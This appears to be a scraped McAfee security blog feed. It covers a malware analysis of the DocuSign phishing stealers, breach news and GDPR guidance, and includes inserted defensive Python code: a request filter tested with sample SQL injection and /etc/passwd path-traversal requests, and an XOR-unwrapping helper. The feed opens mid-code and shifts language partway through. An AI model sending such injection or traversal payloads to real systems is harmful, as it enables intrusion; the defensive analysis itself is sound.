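def evaluate(req: Request, rules: List[Rule] = RULES) -> Optional[str]:
    """Return the name of the first rule that fires (block), or None (forward to the application)."""
    for rule in rules:
        if rule.match(req):
            return rule.name
    return None


def filter_requests(reqs: List[Request], rules: List[Rule] = RULES) -> List[Tuple[str, Optional[str]]]:
    return [(r.url, evaluate(r, rules)) for r in reqs]


# Constructed sample traffic against the hypothetical application.
SAMPLE_REQUESTS = [
    Request("GET", "/api/report?id=42"),
    Request("GET", "/api/report?id=42%20OR%201%3D1"),
    Request("GET", "/static/..%2F..%2Fetc/passwd"),
    Request("TRACE", "/"),
    Request("GET", "/index.html", headers={"X-Padding": "A" * 9000}),
]

if __name__ == "__main__":
    for url, decision in filter_requests(SAMPLE_REQUESTS):
        print(f"{url:45s} -> {decision or 'forward'}")
```

A shield like this is a stopgap, not a fix: it buys the time the report is talking about, and the application still needs the vendor patch once it is available and tested.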

As an industry, we are spending more and working harder to shorten the time advantage of the attacker. Modern tools and thoughtful practices in endpoint and data center infrastructure complement the analytics and automation investments that are transforming the Security Operations Center (SOC), technologies such as anomaly detection and threat intelligence correlation.

This report shows that we still have work to do, and provides evidence for CIOs and the board that there’s a clear business incentive to continue to act.

To read the full report, visit https://mcafee.ly/2r0VNBq.

Chipotle removes malware after breach strikes payment systems https://securingtomorrow.mcafee.com/business/neutralize-threats/chipotle-removes-malware-after-breach-strikes-payment-systems/ Thu, 01 Jun 2017 22:39:15 +0000 https://securingtomorrow.mcafee.com/?p=74733 (Bloomberg) – Chipotle Mexican Grill Inc., which warned investors and customers last month that it had suffered a data breach, gave the all-clear on Friday, saying it had removed malicious software from its systems. The company identified the so-called malware during a probe that included law enforcement, payment-card networks and cybersecurity firms, the burrito chain …

The post Chipotle removes malware after breach strikes payment systems appeared first on McAfee Blogs.

(Bloomberg) – Chipotle Mexican Grill Inc., which warned investors and customers last month that it had suffered a data breach, gave the all-clear on Friday, saying it had removed malicious software from its systems.

The company identified the so-called malware during a probe that included law enforcement, payment-card networks and cybersecurity firms, the burrito chain said. Hackers installed the software in order to grab customer data from point-of-sale devices, striking between March 24 and April 18.

“The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the POS device,” Chipotle said in a statement. “There is no indication that other customer information was affected.”

The data breach was the latest setback for a company that has struggled to revive growth. An E. coli scare in late 2015 sent its sales and stock price plunging. To win back customers, the Denver-based chain has rolled out a new ad campaign and free-food offers. The company also shook up its board after being targeted by activist investor Bill Ackman.

Same-store sales began to recover last quarter after declining for five straight periods, raising hope that a turnaround is underway.

On Friday, Chipotle warned customers to check their credit-card statements for unauthorized charges and “remain vigilant to the possibility of fraud.”

This article was written by Nick Turner from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Misuse of DocuSign Email Addresses Leads to Phishing Campaign https://securingtomorrow.mcafee.com/mcafee-labs/misuse-of-docusign-email-addresses-leads-to-phishing-campaign/ https://securingtomorrow.mcafee.com/mcafee-labs/misuse-of-docusign-email-addresses-leads-to-phishing-campaign/#respond Thu, 01 Jun 2017 21:23:45 +0000 https://securingtomorrow.mcafee.com/?p=74198 DocuSign, which provides electronic signatures and digital transaction management, reported that email addresses were stolen by an unknown party on May 15. Although the company confirmed that no personal information was shared, DocuSign has reported that a malicious third party gained temporary access to a separate, non-core system that allows it to communicate service-related announcements to …

The post Misuse of DocuSign Email Addresses Leads to Phishing Campaign appeared first on McAfee Blogs.

DocuSign, which provides electronic signatures and digital transaction management, reported on May 15 that email addresses had been stolen by an unknown party. Although the company confirmed that no other personal information was exposed, DocuSign reported that a malicious third party had gained temporary access to a separate, non-core system used to send service-related announcements to users by email. The incident has left many DocuSign individual users and business professionals exposed, because the attacker group is using the stolen addresses for phishing. Users are receiving emails at their corporate addresses asking them to review and sign job-related documents, such as accounting invoices, by clicking the “Review Document” link in the malicious message.

Spam email.

The phishing link downloads a document file containing malicious code; when the document is opened, the code injects malware into the system process svchost.exe.

Process injection.

The injected process sends a request to the following URLs:

Contacting the remote host.

The malware receives the response:

Response from server.

The response is an encrypted file that could be any of three types:

  • DLL: the common password stealer Pony Loader, aka Fareit.
  • EXE: a similar variant known as Evil Pony.
  • EXE: ZLoader, which loads exploit kits and other malware.

The compressed and encrypted stealer component.

The files are aPLib-compressed and XOR-encrypted, and each download carries its own key: the first 8 bytes of the file are the XOR key. Strip the key, XOR the remainder with it, and then decompress the result with aPLib to recover the component.

The decrypted stealer component.
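How the key-in-prefix layer is undone, as an added example that is neither McAfee's analysis code nor the malware's own: the first 8 bytes of the download are taken as the XOR key and the remainder is XORed with them, after which a sanity check looks for a PE header. The aPLib decompression step is left as a hook rather than implemented here, so against a real download a depacker has to be plugged in. The "payload" is a constructed, inert stub (an MZ/PE header with filler text, not a real sample), and the wrapping helper exists only so the example runs offline.

```python
import hashlib
import math
from collections import Counter
from typing import Callable, Dict, Optional

KEY_LEN = 8   # the analysed download carries its XOR key in the first 8 bytes


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check after unwrapping: MZ stub and a PE signature where e_lfanew points."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; a drop after decryption is a quick signal that the key was right."""
    if not data:
        return 0.0
    counts = Counter(data)
    return -sum((n / len(data)) * math.log2(n / len(data)) for n in counts.values())


def unwrap_payload(blob: bytes, key_len: int = KEY_LEN,
                   decompress: Optional[Callable[[bytes], bytes]] = None) -> Dict:
    """Strip the key prefix, XOR the rest with it, then (optionally) hand the result to an aPLib depacker."""
    if len(blob) <= key_len:
        raise ValueError("blob too short to contain a key and a payload")
    key, body = blob[:key_len], blob[key_len:]
    plain = xor_bytes(body, key)
    if decompress is not None:          # real samples: plug an aPLib depack routine in here (not implemented)
        plain = decompress(plain)
    return {
        "key": key.hex(),
        "entropy_before": shannon_entropy(body),
        "entropy_after": shannon_entropy(plain),
        "is_pe": looks_like_pe(plain),
        "sha256": hashlib.sha256(plain).hexdigest(),
        "payload": plain,
    }


def build_stub_pe(filler: bytes) -> bytes:
    """Constructed, inert fake PE: MZ header, e_lfanew=0x40, 'PE' signature, then filler. Not executable."""
    header = b"MZ" + b"\0" * (0x3C - 2) + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 4
    return header + filler


def wrap_payload(payload: bytes, key: bytes) -> bytes:
    """Reverse direction, used only to build test input in the same layout as the download."""
    assert len(key) == KEY_LEN
    return key + xor_bytes(payload, key)


# Constructed sample: a stub 'executable' wrapped with a fixed 8-byte key.
SAMPLE_KEY = bytes.fromhex("1f8ea7c3440b96d2")
SAMPLE_PAYLOAD = build_stub_pe(b"constructed stub, not a real stealer. " * 8)
SAMPLE_BLOB = wrap_payload(SAMPLE_PAYLOAD, SAMPLE_KEY)

if __name__ == "__main__":
    result = unwrap_payload(SAMPLE_BLOB)
    print({k: v for k, v in result.items() if k != "payload"})
```

Because the key ships with the data, this layer is obfuscation rather than encryption: it defeats string scanning on the wire, not an analyst with the file.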

The DLL uses many anti-debugging techniques to hinder analysis. It also creates a mutex so that only one instance of it runs on a machine at a time.

Creating the mutex.

The DLL, Pony Loader, steals the username, password, and other information. The following screenshots show code for stealing user credentials from Chrome and Outlook.

Code for stealing Chrome credentials.

Code for stealing Outlook credentials.

The EXE, Evil Pony, steals credentials from FileZilla:

Code for stealing FileZilla credentials.

Once downloaded, this malware monitors the user’s keystrokes, captures personal information such as usernames and passwords, and sends it to the malware operator.

DocuSign has reported that it took quick measures to block the unauthorized access and has added further security controls to its systems. The company has also advised its users to keep their antimalware software updated.

McAfee urges all customers to ensure McAfee’s DAT updates have been applied to ensure the latest protection. We advise customers to be diligent in applying security updates for all the software they use.

SHA256 hashes of the analyzed samples:

  • fff786ec23e6385e1d4f06dcf6859cc2ce0a32cee46d8f2a0c8fd780b3ecf89a: W97M/Dropper.cu
  • 5bcd2d8ed243d6a452d336c05581291bc63ee489795e8853b9b90b5f35c207d8: RDN/Generic PWS.y
  • 437351c9ae0a326ed5f5690e99afc6b723c8387f1ed87c39ebcce85f9103c03a: Fareit-FCH
  • 9f346deed73194928feda785dca92add4ff4dd19fbc1352cebaa6766e0f69a38: Generic PWS.o

Preparing for the General Data Protection Regulation 2017, Part 2: Building a Culture of Privacy and Security by Design https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-2-schaffung-einer-kultur-des-datenschutzes-und-der-konzeptionellen-sicherheit/ https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-2-schaffung-einer-kultur-des-datenschutzes-und-der-konzeptionellen-sicherheit/#respond Wed, 31 May 2017 21:59:29 +0000 https://securingtomorrow.mcafee.com/?p=75167 This is the second part of a series of blog posts intended to prepare security leaders and business executives for the General Data Protection Regulation (GDPR) in 2017. When you think about the new EU General Data Protection Regulation (GDPR), do not think first of fines. Think of building a culture of privacy and security by design. What does that mean? …

The post Preparing for the General Data Protection Regulation 2017, Part 2: Building a Culture of Privacy and Security by Design appeared first on McAfee Blogs.

This is the second in a series of blog posts intended to prepare security officers and business executives for the General Data Protection Regulation (GDPR) 2017.

Don’t think of the new EU General Data Protection Regulation (GDPR) primarily in terms of fines. Think of it in terms of creating a culture of data protection and security by design.

What does that mean? This approach is about protecting personal data and about cybersecurity, but it encompasses far more than personal data and technology. Just because the “D” in DSGVO stands for “Daten” (data), you cannot simply switch on a data loss prevention (DLP) solution and consider the job done. Even with a technology-led approach (and don’t get me wrong, greater use of DLP technology is certainly a good thing), every organisation still has to think about the business processes it affects, the breach detection processes it affects, the employees who will operate that technology, and the individuals whose data is processed, because they are the ones exposed to personal risk.

Let’s stay with the employees for a moment. Within an organisation, you need to keep in view how the various roles are affected. This ranges from general users to users with elevated privileges, senior staff and executives.

As for business processes, you need to ask which data flows exist and what is affected by the collection, storage and use of personal data. Appropriate technological and procedural controls must be in place.

To put all this into practice, frameworks like the following need to be applied. First, think about security strategy in terms of governance, people, processes and technology. Then consider the security outcomes needed to be ready for the GDPR, and the corresponding solutions.

Reviewing the security strategy

With this new regulation, the bar for data protection within an organisation is definitely higher. Preparing for the various protection and reporting requirements of the new regulation, within an interconnected, dynamic digital enterprise, requires a holistic review of the security strategy with regard to governance, people, processes and technology:

  • In many cases, preparing for the new regulation first requires the appointment of a data protection officer who is responsible for regulatory compliance and communication with the supervisory authorities. Moreover, given the high fines for violations, the GDPR demands the attention of senior management, so new internal reporting structures will likely have to be created and a culture of continuous compliance is required. These structures are essential for developing a successful, long-term data protection programme.
  • Within an organisation, every individual bears responsibility for data security, not just the people in the security function. It is important that all employees, from executives to users, administrators and developers, are trained in protecting data and are ready to push back when shortcuts are proposed. Treating employees as part of the solution rather than part of the problem helps develop a culture of security and privacy by design.
  • Several key security and business processes should be reviewed for applicability and current capability. This review should look closely at data flows, data collection, processing, storage and management in order to understand the scope of the problem. Key data protection processes include classification and monitoring as well as application development and security testing.
  • We should think about a security system that enables the protection of data at rest, in transit or in use and ensures rapid detection of and response to breaches. Organisations should examine whether their current best-of-breed security technology strategy delivers the effectiveness needed to keep pace with new threats and enables the operational efficiency required to stay within budget.

Measuring security outcomes

To assess whether you are sufficiently prepared for the GDPR, the organisation’s current security programme must be reviewed. The following cybersecurity outcomes are critical for any organisation undergoing digital transformation and represent the main pillars of GDPR preparation. Your security solutions must be able to ensure that the technical building blocks of endpoints, networks, the cloud and security operations centres work together as a coordinated system to deliver the required prevention, detection and response capabilities, so that the key outcomes can be achieved.

  • Neutralising emerging threats. Malware infections and the exploitation of application vulnerabilities are key attack vectors that lead to data exfiltration. Advanced threat protection on endpoints and in networks can significantly reduce the attack surface for known and unknown malware. In security operations centres, threat intelligence from multiple sources must be used to proactively hunt for attackers.
  • Protecting vital data. A good data security programme must provide the ability to protect data and to detect and act against accidental data loss or malicious theft attempts. Encryption technologies and data loss prevention technologies are extremely important for preventing accidental data loss. In security operations centres, SIEM solutions combined with advanced user behaviour analytics are key factors in detecting and investigating insider threats.
  • Protecting cloud environments. Software-as-a-Service (SaaS) and cloud-hosted applications pose particular challenges for GDPR preparation. However, many organisations use separate cloud and enterprise security solutions, which can create gaps in visibility and protection. What about a unified security system that makes it easy to extend protection, detection and correction capabilities to cloud environments?
  • Optimising security operations. Many security operations centres lack the ability to detect and respond to data breaches. A critical requirement for GDPR readiness is the ability to report incidents within three days, so it is essential to develop data breach playbooks within security operations. Orchestration technologies can also help close gaps and speed up incident response.

This is my recommended framework, which starts with the four dimensions of security strategy in order to create a culture of data protection and security by design.

The second half of the framework shows how security must be approached in order to achieve the desired outcomes and be ready for the GDPR.

This should be front of mind for security officers and business executives this year. They should prioritise investments and implement new programmes or solutions to ensure the organisation is ready for the stricter regulatory environment.

How ready are you?

Caught in the breach – what to do first https://securingtomorrow.mcafee.com/business/optimize-operations/caught-in-the-breach-what-to-do-first/ Wed, 31 May 2017 21:50:59 +0000 https://securingtomorrow.mcafee.com/?p=74648 Security experts have been saying for more than a decade that it is “not if, but when” an organization will be hacked. So, the more relevant question, posed in the title of a panel discussion at May 24’s MIT Sloan CIO Symposium is: “You Were Hacked: Now What?” Indeed, given that there is no sure way …

The post Caught in the breach – what to do first appeared first on McAfee Blogs.

Security experts have been saying for more than a decade that it is “not if, but when” an organization will be hacked. So, the more relevant question, posed in the title of a panel discussion at May 24’s MIT Sloan CIO Symposium is: “You Were Hacked: Now What?”

Indeed, given that there is no sure way to prevent every intrusion by so-called “determined adversaries,” much of the defense playbook has shifted to incident response (IR). And that, said panelists, if done quickly and correctly, can mitigate the damage attackers can cause, even if they make it inside a network.

“Hacking is an action,” said Andrew Stanley, CISO of Phillips. “A breach is the outcome. So we spend more time on the hack than the breach. We want to know how, why – what was the intent – when and where. That’s what the C-suite wants to know more than the nature of the breach.” Answering those questions is what helps make the response, and therefore containing the damage, more effective, he added.

James Lugabihl, director, execution assurance at ADP, agreed that the key to limiting the damage of a breach is, “how quickly can you respond and stop it.” He said it is also crucial not to react without complete information. “It’s almost like a disaster scenario you see on the news,” he said. “It takes a lot of patience not to react too quickly. A lot of my information may be incomplete, and it’s important to get everybody staged. It isn’t a sprint, it’s a marathon. You need time to recognize data so you’re not reacting to information that’s incomplete.” With the right information, he said, it is possible to “track and eradicate” malicious intruders, plus see what their intentions were.

Both panelists said legal notification requirements can vary by country, or even by state, and if it is not a mandate, notifying law enforcement is something they will sometimes try to avoid. “Executives don’t like it, because it becomes a matter of public record,” Stanley said. “But it also can affect people’s privacy, and you don’t want to become an arm of the government.”

Aside from who needs to know and who legally must know, Stanley said collecting information that can help with the response is the most important thing to do. “It’s about intent,” he said. “If all (phishing) emails are going to one location, that’s an attack. So we need to ask: What do we do there? What’s the target?”

Both also said they conduct tabletop exercises, pen testing and simulated crises to practice their IR for when the real thing happens. But, as Lugabihl noted, “it takes perfect practice to make a perfect response. Bad practice makes bad response.”

To a question from moderator Keri Pearlson, executive director of the MIT Interdisciplinary Consortium on Improving Critical Cybersecurity Infrastructure, about how to cope with the reality that “people are the weakest link” in the security chain, Lugabihl said workers are not entirely at fault. “We haven’t fostered an environment that lets them do their jobs,” he said. “I’ve seen security professionals fall for phishing – those are getting more sophisticated. We just need to encourage them to report it. We need to help make things easier and more transparent.”


This article was written by Taylor Armerding from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Preparing for GDPR in 2017, Part 2: Creating a Culture of Privacy and Security by Design https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-2-creating-culture-privacy-security-design/ https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-2-creating-culture-privacy-security-design/#respond Wed, 31 May 2017 21:32:15 +0000 https://securingtomorrow.mcafee.com/?p=74596 This is the second in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017. (Part 1, 3, 4) Don’t think about the new EU General Data Protection Regulation (GDPR) in terms of fines. Think about creating a culture of privacy and security by design. What does that …

The post Preparing for GDPR in 2017, Part 2: Creating a Culture of Privacy and Security by Design appeared first on McAfee Blogs.

This is the second in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017. (Part 1, 3, 4)

Don’t think about the new EU General Data Protection Regulation (GDPR) in terms of fines. Think about creating a culture of privacy and security by design.

What does that mean? While such an approach will encompass personal data protection and cybersecurity, this is about much more than personal data and technology. Just because the ‘D’ in GDPR stands for ‘data’, you can’t just turn on a data loss prevention (DLP) solution and consider the job done. Even with a technology-led approach – and don’t get me wrong, adopting more DLP tech is a good thing – any organisation still has to think about the business processes it affects, the breach detection processes it affects, the people who will operate that technology, and those individuals whose data is processed – as they face personal risk.

Sticking with the people for a moment, across an organisation you need to see how various roles are affected. That means from the general user, to privileged users to senior executives or leaders.

Then with the business processes, what are the data flows and what’s affected by the collection, storage and usage of personal data? The proper technology and procedural controls have to be put in place.

So the way to do all this is to adopt frameworks like those that follow here. First think of security strategy in terms of governance, people, processes and technology. Then consider the security outcomes you need to be GDPR-ready, and the relevant solutions.

Reviewing Security Strategy:

This new regulation certainly raises the bar for data protection within an organisation. Preparing for the various protection and reporting conditions of the new regulation – within an interconnected, fast-moving digital enterprise – demands a holistic review of security strategy across governance, people, process and technology:

Governance

In many circumstances, preparing for the new regulation requires the appointment of a data protection officer who is responsible for organisational compliance and communication with supervisory authorities. Moreover, given the high fines that can be levied for violations, GDPR has board-level attention, which most likely requires new internal reporting structures and a continuous compliance culture. These structures are essential to developing a successful data protection programme for the long term.

People

Within any organisation, data security is everyone’s responsibility, not just the guys in security ops. It’s essential that all people from executives to users, administrators and developers be educated on how to protect data and ready to challenge when shortcuts are proposed. Making our people part of the solution and not the problem goes a long way in developing a culture of security and privacy by design.

Processes

Several key security and business processes should be reviewed for applicability and current state of capability. This review should take a comprehensive look at data collection, flows, processing, storage and handling to get an understanding of the scope of the issue. Key data protection processes include classification and monitoring, as well as application development and security testing.

Technology

We should think about a security system that allows you to protect data at rest, in motion or in use while enabling rapid detection and response to a breach. Organisations should review whether their current best-of-breed security technology strategy will deliver the effectiveness needed to keep pace with new threats and enable the operational efficiency needed to stay within budget.

Measuring Security Outcomes:

Assessing GDPR-readiness requires a review of the organisation’s current security programme. The following cyber security outcomes are critical to any organisation undergoing digital transformation and are the main pillars of any GDPR-readiness preparations. Your security solutions should enable the technical building blocks at the endpoint, network, cloud and SOC to work together as an orchestrated system that delivers the prevention, detection and response capability necessary to deliver the key outcomes.

Neutralise Emerging Threats

Malware infections and exploits of application vulnerabilities are key attack vectors that lead to data exfiltration. Advanced threat defences at the endpoint and network can harden the attack surfaces against known and unknown malware. In the SOC, leverage threat intelligence from multiple sources to proactively hunt for attackers.

Protect Vital Data

Any good data security programme must have the capability to protect, detect and correct against accidental data loss or malicious theft attempts. Encryption and data loss prevention (DLP) technology are fundamental to preventing accidental data loss incidents. In the SOC, SIEM combined with advanced user behaviour analytics will be the key enablers to identify and investigate insider threats.

Protect Cloud Environments

Software-as-a-service (SaaS) and cloud-hosted applications present particular challenges for GDPR preparations. However, many organisations use separate cloud and enterprise security solutions, which can create gaps in visibility and protection. Think about a unified security system that allows you to extend protection, detection and correction capability to cloud environments easily.

Optimise Security Operations

Many security operations centres lack capabilities for data breach detection and response. A critical requirement in GDPR readiness is being able to report within three days, so it’s essential to develop data breach playbooks within security operations. Additionally, orchestration technologies can help bridge gaps and speed up incident response.

This is my recommended framework, starting with the four dimensions of security strategy to get to a culture of security and privacy by design.

The second half of the framework shows how security must be approached to get the right GDPR-ready outcomes.

Getting ready for the GDPR should be front of mind for enterprise business and security executives this year, who should prioritise investments and implement new programmes or solutions that ensure the business is ready for the enhanced regulatory environment.

How ready are you?

Beyond Bitcoin for Ransomware https://securingtomorrow.mcafee.com/business/beyond-bitcoin-ransomware/ https://securingtomorrow.mcafee.com/business/beyond-bitcoin-ransomware/#respond Wed, 31 May 2017 20:19:27 +0000 https://securingtomorrow.mcafee.com/?p=74635 Ransomware is bringing Bitcoin into popular culture and raising awareness about cryptocurrencies. In May, the price of Bitcoin surged to over US$2,800 before retreating. It remains the “go to” digital currency for ransomware authors due to its relative anonymity, ease of use, and popularity. As the ability for the public to acquire digital currencies other than Bitcoin …

The post Beyond Bitcoin for Ransomware appeared first on McAfee Blogs.

Ransomware is bringing Bitcoin into popular culture and raising awareness about cryptocurrencies. In May, the price of Bitcoin surged to over US$2,800 before retreating. It remains the “go to” digital currency for ransomware authors due to its relative anonymity, ease of use, and popularity.

As the ability for the public to acquire digital currencies other than Bitcoin becomes easier, cybercriminals will look to these alternatives to Bitcoin for funding malicious activities. In fact, hundreds of cryptocurrencies are now available on public markets. Some of these emerging “altcoins” offer improvements over Bitcoin in features cybercriminals value, such as anonymity and privacy, and are already used in illicit transactions on the dark web. Monero, for example, is gaining popularity on the dark web. Dash and Zcash also focus on techniques to keep financial transactions private and anonymous.

Arguably, the most popular cryptocurrency after Bitcoin is Ethereum. However, unlike Bitcoin, Ethereum is also a platform that allows developers to build applications – called “smart contracts” – that execute as part of a blockchain. Numerous industry efforts make interacting with the Ethereum blockchain easier for developers:

As development platforms for building applications and products on public blockchains evolve, the ability to leverage these for criminal activity will also increase. Cybercriminals will soon start building applications on blockchains, such as Ethereum, to automate the process of payment collection. For example, cybercriminals could build smart contracts into their ransomware packages. Encryption keys could be created and released on infection, and after subsequent payment to the smart contract, the package could ‘self-destruct’ and remove itself from the blockchain.

As with any new technology that holds the promise of solving important and legitimate technical problems, that same technology can be used to enable illegitimate activity. Understanding what that activity can be, where the potential for misuse is, and how to identify it when it occurs is going to be increasingly important for security professionals, especially as blockchain development becomes more prevalent in enterprise organizations.

Android Devices Potentially Compromised by Judy App Weaknesses https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/android-devices-compromised-judy-apps/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/android-devices-compromised-judy-apps/#respond Wed, 31 May 2017 17:12:26 +0000 https://securingtomorrow.mcafee.com/?p=74599 We’ve seen cyberattacks truly embody their names as of late, given how the massive WannaCry ransomware attack left quite a few in tears. Now, we have Judy, a set of insecure gaming apps, which are aptly named after their “cutesy” main character. And though these 41 Android apps are characterized by the sweet avatar, the …

The post Android Devices Potentially Compromised by Judy App Weaknesses appeared first on McAfee Blogs.

We’ve seen cyberattacks truly embody their names as of late, given how the massive WannaCry ransomware attack left quite a few in tears. Now, we have Judy, a set of insecure gaming apps, which are aptly named after their “cutesy” main character. And though these 41 Android apps are characterized by the sweet avatar, the security complications they carry are anything but cute.

These Judy apps are poorly designed, which has created security gaps and makes them subject to abuse. Leveraging this lack of security, cybercriminals can manipulate the apps to auto-click on banners from Google ads, which generates revenue for the crooks behind the scheme.

So now the question is: how do mobile users stay safe? First off, it’s important for developers to create apps with security in mind. Regardless, Google has removed all of the Judy apps, which came from Korean developer Kiniwini, from the Google Play store. But remember that these apps are available on iOS as well, so all mobile users need to stay on the lookout. To protect yourself from risky apps such as the Judy apps, follow these tips:

- Do your homework. Before you even download an app, make sure you head to the reviews section of an app store first. Take the time to sift through the reviews, and keep an eye out for ones that mention that the app has had issues with security or might be a bit sketchy. When in doubt, don’t download any app that is remotely questionable.

- Keep apps up-to-date. The developer behind the Judy applications will soon likely include a security patch in the latest updates for their apps. Therefore, as a good practice, whenever updates are available for any of your applications, make sure to install them immediately.

- Use a mobile security solution. As risky apps continue to persist in both Google’s and Apple’s official app stores, make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

Preparing for the GDPR in 2017, Part 2: Establishing a Culture of Privacy and Security by Design https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-deuxieme-partie-instaurer-une-culture-de-la-protection-de-la-vie-privee-et-de-la-securite-des-la-conception/ https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-deuxieme-partie-instaurer-une-culture-de-la-protection-de-la-vie-privee-et-de-la-securite-des-la-conception/#respond Wed, 31 May 2017 15:34:47 +0000 https://securingtomorrow.mcafee.com/?p=75034 This blog post is the second in a series intended to help business leaders and security executives prepare for the GDPR throughout 2017. Fines… The European Union’s new General Data Protection Regulation is no doubt, for you, a …

The post Preparing for the GDPR in 2017, Part 2: Establishing a Culture of Privacy and Security by Design appeared first on McAfee Blogs.

Cet article de blog est le deuxième d’une série dont le but est d’aider les dirigeants d’entreprise et les cadres responsables de la sécurité à se préparer au RGPD tout au long de l’année 2017.

 

Les amendes… Sans doute le nouveau règlement général sur la protection des données de l’Union européenne est-il pour vous une source d’angoisse. Pourtant, vous devriez saisir l’occasion pour instaurer une culture de la protection de la vie privée et de la sécurité dès la conception.

Qu’est-ce que cela signifie ? Certes, la protection des données à caractère personnel et la cybersécurité sont au cœur de cette approche. Mais cela ne se résume pas aux données et aux technologies, loin de là. Ce n’est pas parce que le « D » de RGPD signifie « données » qu’il vous suffira de déployer une solution de prévention des fuites de données (DLP) pour que le tour soit joué. Même si l’approche est technologique (et comprenez-moi bien, je n’ai pas dit qu’adopter d’autres technologies DLP n’était pas une bonne chose), toute entreprise doit réfléchir à plusieurs éléments. Pensez aux processus métier et aux processus de détection des violations qu’elle affecte, au personnel chargé de faire fonctionner ces technologies et aux citoyens dont les données sont traitées — car ces personnes encourent des risques sur le plan personnel.

En ce qui concerne le personnel, vous devez déterminer l’impact qu’auront les technologies sur les divers rôles au sein de l’entreprise. Autrement dit, les utilisateurs normaux, ceux avec privilèges, les cadres dirigeants et les dirigeants.

Viennent ensuite les processus métier. Quels sont les flux de données ? Et sur quoi la collecte, la conservation et l’utilisation des données à caractère personnel ont-elles une incidence ? Vous devez prendre les mesures appropriées en termes de technologies et de procédures.

Je vous recommande donc d’adopter un cadre tel celui décrit ci-dessous. Tout d’abord, lorsque vous songez à votre stratégie de sécurité, pensez gouvernance, ressources humaines, processus et technologies. Ensuite, réfléchissez aux objectifs de sécurité à atteindre pour être préparé au RGPD, ainsi qu’aux solutions à mettre en œuvre.

 

Refonte de votre stratégie de sécurité

Il est clair que le nouveau règlement place la barre plus haut en termes de protection des données. Pour l’entreprise numérique hyperdynamique et interconnectée, se préparer aux nouvelles exigences de protection et de reddition de comptes ne sera pas simple. Cela nécessitera un remaniement global de différents aspects de la stratégie de sécurité : gouvernance, ressources humaines, processus et technologies.

  • Bien souvent, pour préparer l’entreprise à la mise en œuvre de ce nouveau règlement, il sera nécessaire de nommer un délégué à la protection des données ; celui-ci sera responsable de la conformité opérationnelle et de la communication avec les autorités de contrôle. De plus, au vu des montants potentiels des amendes en cas de non-respect du RGPD, celui-ci suscite l’intérêt des conseils d’administration. Il nécessitera sans doute la mise en place de nouvelles structures internes de rapport et le développement d’une véritable culture de respect de la conformité. Ces structures sont indispensables à la création d’un programme de protection des données performant sur le long terme.
  • Ressources humaines.Au sein de l’entreprise, la protection des données est la responsabilité de chacun, pas seulement de l’équipe de sécurité. Il est essentiel que tous les intervenants, depuis les cadres dirigeants jusqu’aux utilisateurs, en passant par les administrateurs et les développeurs, soient formés à la protection des données et prêts à remettre en question les mesures de « raccourci » qui seraient proposées. Et les intégrer à la solution, plutôt que voir en eux un problème, contribue grandement à l’instauration d’une culture de la protection de la vie privée et de la sécurité dès la conception.
  • Plusieurs processus métier et de sécurité fondamentaux devront être analysés pour vérifier leur adéquation et évaluer leurs fonctions. Pour cela, il faudra examiner de façon approfondie la collecte, les flux, le traitement, la conservation et la gestion des données pour bien comprendre la portée du problème. Les processus clés de protection des données incluent notamment la classification et la surveillance, ainsi que le développement d’applications et les tests de sécurité.
  • Il convient d’envisager un système de sécurité permettant non seulement de protéger les données au repos, en mouvement et en cours d’utilisation, mais aussi de détecter rapidement les violations tout en limitant le délai de réponse. Les entreprises doivent déterminer si la stratégie de sécurité en place s’appuie sur des technologies suffisamment à la pointe et efficaces pour faire face aux menaces récentes et garantir l’efficacité opérationnelle nécessaire afin d’éviter tout dépassement de budget.

 

Mesure de l’efficacité de la sécurité

Pour évaluer son degré de préparation au RGPD, une entreprise doit examiner son programme de sécurité. Toute entreprise engagée dans un projet de transformation numérique doit impérativement disposer d’un dispositif de cybersécurité capable d’assurer les niveaux de fonctions et de performances ci-dessous, qui constituent les principaux piliers d’une bonne préparation au RGPD. Vos solutions de sécurité doivent permettre aux composants techniques situés au niveau du terminal, du réseau, du cloud et du centre d’opérations de sécurité (SOC) de fonctionner ensemble comme un système orchestré. Ce dernier doit offrir les fonctions de prévention, de détection et de réponse nécessaires à la réalisation des objectifs d’efficacité attendus.

  • Neutralizing emerging threats. Malware infections and exploits that take advantage of application vulnerabilities are among the main attack vectors leading to data exfiltration. Advanced threat defenses deployed on endpoints and the network reduce the attack surface by strengthening protection against known and unknown malware. At the SOC level, use threat intelligence drawn from multiple sources to proactively hunt for attackers.
  • Protecting critical data. To be effective, a data security program must detect and block both accidental data leaks and malicious data theft attempts, and apply the required corrective measures. Encryption and data loss prevention (DLP) technologies are essential to prevent data from leaving the company by accident. Within the SOC, a SIEM solution and advanced user behavior analytics provide the strategic combination needed to identify and analyze insider threats.
